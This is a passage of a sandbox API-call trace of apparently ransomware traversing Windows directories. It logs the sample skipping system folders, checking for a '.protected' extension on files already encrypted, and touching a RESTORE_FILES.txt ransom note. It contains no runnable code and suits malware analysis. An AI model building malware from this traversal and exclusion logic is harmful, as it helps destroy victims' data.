lpSrch=".protected") returned=".protected" [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt") returned 69 [0093.195] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.195] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.195] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.196] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt") returned 69 [0093.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.196] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.196] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\RESTORE_FILES.txt") returned 58 [0093.196] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.196] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.196] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.196] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.196] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\RESTORE_FILES.txt") returned 58 [0093.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.197] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="Windows") returned -1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files") returned -1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files (x86)") returned -1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="$Recycle.bin") returned 1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="System Volume Information") returned -1 [0093.198] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE") returned 39 [0093.198] lstrcmpW (lpString1="OFFICE", lpString2=".") returned 1 [0093.198] lstrcmpW (lpString1="OFFICE", lpString2="..") returned 1 [0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*") returned 41 [0093.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.198] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.198] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.198] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.198] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.198] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\.") returned 41 [0093.198] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.198] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.198] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.198] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.198] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.198] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.198] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\..") returned 42 [0093.198] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.198] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.198] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="Windows") returned -1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="Program Files") returned -1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="System Volume Information") returned -1 [0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.protected") returned 66 [0093.198] StrStrIW (lpFirst="AssetLibrary.ico.protected", lpSrch=".protected") returned=".protected" [0093.198] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.198] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="Program Files") returned -1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.protected") returned 72 [0093.199] StrStrIW (lpFirst="DocumentRepository.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="Program Files") returned -1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.protected") returned 67 [0093.199] StrStrIW (lpFirst="MySharePoints.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="Program Files") returned -1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.protected") returned 60 [0093.199] StrStrIW (lpFirst="MySite.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\RESTORE_FILES.txt") returned 57 [0093.199] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.199] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="Program Files") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="Program Files (x86)") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.protected") returned 74 [0093.199] StrStrIW (lpFirst="SharePointPortalSite.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="Program Files") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="Program Files (x86)") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.protected") returned 72 [0093.199] StrStrIW (lpFirst="SharePointTeamSite.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="Windows") returned -1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files") returned 1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files (x86)") returned 1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="$Recycle.bin") returned 1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="System Volume Information") returned 1 [0093.200] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions") returned 50 [0093.200] lstrcmpW (lpString1="UICaptions", lpString2=".") returned 1 [0093.200] lstrcmpW (lpString1="UICaptions", lpString2="..") returned 1 [0093.200] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*") returned 52 [0093.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.200] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.200] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.200] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.200] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.200] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.200] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\.") returned 52 [0093.200] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.200] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.201] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.201] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.201] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.201] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.201] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.201] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\..") returned 53 [0093.201] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.201] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.201] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="Windows") returned -1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="Program Files") returned -1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="Program Files (x86)") returned -1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="$Recycle.bin") returned 1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="System Volume Information") returned -1 [0093.201] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036") returned 55 [0093.201] lstrcmpW (lpString1="1036", lpString2=".") returned 1 [0093.201] lstrcmpW (lpString1="1036", lpString2="..") returned 1 [0093.201] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*") returned 57 [0093.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.201] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.201] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.201] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\.") returned 57 [0093.202] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\..") returned 58 [0093.202] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.202] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.protected") returned 86 [0093.202] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.protected") returned 86 [0093.202] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.protected") returned 87 [0093.203] StrStrIW (lpFirst="GRINTL32.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.protected") returned 83 [0093.203] StrStrIW (lpFirst="MAPIR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.protected") returned 86 [0093.203] StrStrIW (lpFirst="MOR6INT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.protected") returned 85 [0093.203] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.protected") returned 86 [0093.203] StrStrIW (lpFirst="MSOINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.protected") returned 85 [0093.204] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.protected") returned 84 [0093.204] StrStrIW (lpFirst="ONINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.protected") returned 85 [0093.204] StrStrIW (lpFirst="ONINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 